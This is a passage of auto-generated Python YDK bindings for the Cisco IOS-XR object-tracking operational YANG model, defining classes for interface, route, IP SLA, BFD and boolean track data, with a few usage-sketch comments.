**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
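# Conversion sketch (assumption: the uint32 prefix encodes a packed IPv4
# address, which the model does not state explicitly). Given a populated
# TrackInfoBrief entry `b` from the track-brief list:
#
#     import socket, struct
#     rt = b.track_type_info.route_tracks
#     print(socket.inet_ntoa(struct.pack('!I', rt.prefix)), '/', rt.prefix_length)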
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Return Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
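# Note (sketch): the discriminant leaf mirrors the Track enum and indicates
# which of the four sibling containers (interface-tracks, route-tracks,
# ipsla-tracks, bfd-tracks) actually carries data for a given entry; compare
# track_type_info.discriminant against the model's Track enum members to
# dispatch on the populated child.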
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs.TrackBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackBriefs']['meta_info']
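# Usage sketch (illustrative): the track-brief list is keyed by track_name, so
# each entry's segment path renders as track-brief[track-name='<name>']. Given
# `tracking` from a CRUD read as sketched above:
#
#     for brief in tracking.track_briefs.track_brief:
#         for b in brief.track_info_brief:
#             print(brief.track_name, b.type, 'up' if b.track_state else 'down')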
class TrackTypeRtrReachability(_Entity_):
"""
Object Tracking Type RTR Reachability info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability, self).__init__()
self.yang_name = "track-type-rtr-reachability"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-rtr-reachability"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Indicates whether the state change delay counter is in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-rtr-reachability"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Return Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
